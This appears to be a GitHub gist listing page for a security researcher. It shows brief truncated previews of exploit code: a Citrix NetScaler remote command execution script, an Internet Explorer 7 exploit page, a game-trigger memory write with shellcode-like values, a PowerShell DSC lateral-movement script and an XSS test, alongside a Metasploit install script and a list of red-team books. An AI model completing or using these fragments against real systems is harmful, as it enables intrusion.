0x09AL’s gists

0x09AL / Challenge dealview.c

Created June 30, 2020 20:01

	#include <stdio.h>
	#include <iostream>

	bool a(std::string& str, const std::string& from, const std::string& to) {
	size_t start_pos = str.find(from);
	if(start_pos == std::string::npos)
	return false;
	str.replace(start_pos, from.length(), to);
	return true;
	}

0x09AL / exploit.triggeredit

Created April 6, 2020 14:48

	Trigger("All players"){
	Conditions:
	Always();

	Actions:
	MemoryAddr(0x00512804, Set To, 0x05b51004);
	MemoryAddr(0x05b51000, Set To, 0xcccccccc);
	MemoryAddr(0x5b51004, Set To, 0x0082e8fc);
	MemoryAddr(0x5b51008, Set To, 0x89600000);
	MemoryAddr(0x5b5100c, Set To, 0x64c031e5);

0x09AL / netscaler_exploit.py

Created January 13, 2020 11:12

Citrix ADC / NetScaler Remote Command Execution

	import requests
	import sys
	import time

	append_value = str(time.time())

	print "# By 0x09AL - MDSec ActiveBreach \n"

	def upload_file(url,payload):
	endpoint = url + "/vpns/portal/scripts/newbm.pl"

0x09AL / test.js

Created July 26, 2019 15:22

alert('XSS');

0x09AL / gist:52236cc9356c2dccb2f42f83e6fc10bc

Created January 2, 2019 21:34 — forked from mekuls/gist:3102944

dcpromo.exe DCINSTALL example for new domain

	[DCINSTALL]
	InstallDNS=yes
	NewDomain=forest
	NewDomainDNSName=au.sky
	DomainNetBiosName=au
	ReplicaOrNewDomain=domain
	ForestLevel=4
	DomainLevel=4
	DatabasePath=%systemroot%\ntds
	LogPath=%systemroot%\ntds

0x09AL / PowerShellDSCLateralMovement.ps1

Created June 29, 2018 09:23 — forked from mattifestation/PowerShellDSCLateralMovement.ps1

	# This idea originated from this blog post on Invoke DSC Resources directly:
	# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/

	<#
	$MOFContents = @'
	instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
	{
	ResourceID = "[Script]ScriptExample";
	GetScript = "\"$(Get-Date): I am being GET\" \| Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
	TestScript = "\"$(Get-Date): I am being TESTED\" \| Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";

0x09AL / msf-install.sh

Created March 30, 2018 08:26

	sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev

	cd ~
	git clone git://github.com/sstephenson/rbenv.git .rbenv
	echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
	echo 'eval "$(rbenv init -)"' >> ~/.bashrc
	exec $SHELL

	git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
	echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc

0x09AL / gist:f94ba19eceb6306572458655e416e015

Created January 4, 2018 20:42 — forked from carnal0wnage/gist:606c41ac6ec40bf5c69d4db96d9312e3

Red Team Books

	From: http://redteams.net/bookshelf/
	Techie

	Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
	Social Engineering: The Art of Human Hacking by Christopher Hadnagy
	Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
	The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
	Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
	Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
	The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors

0x09AL / exploit.html

Created July 6, 2017 13:12

Internet Explorer 7 RSP Exploit for blogpost

	<!DOCTYPE html>
	<html>
	<head>
	<title> Exploit for IE 7 </title>
	<object id="VULNERABLE" classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687'></object>
	</head>
	<body>

	<script type="text/javascript">

0x09AL 0x09AL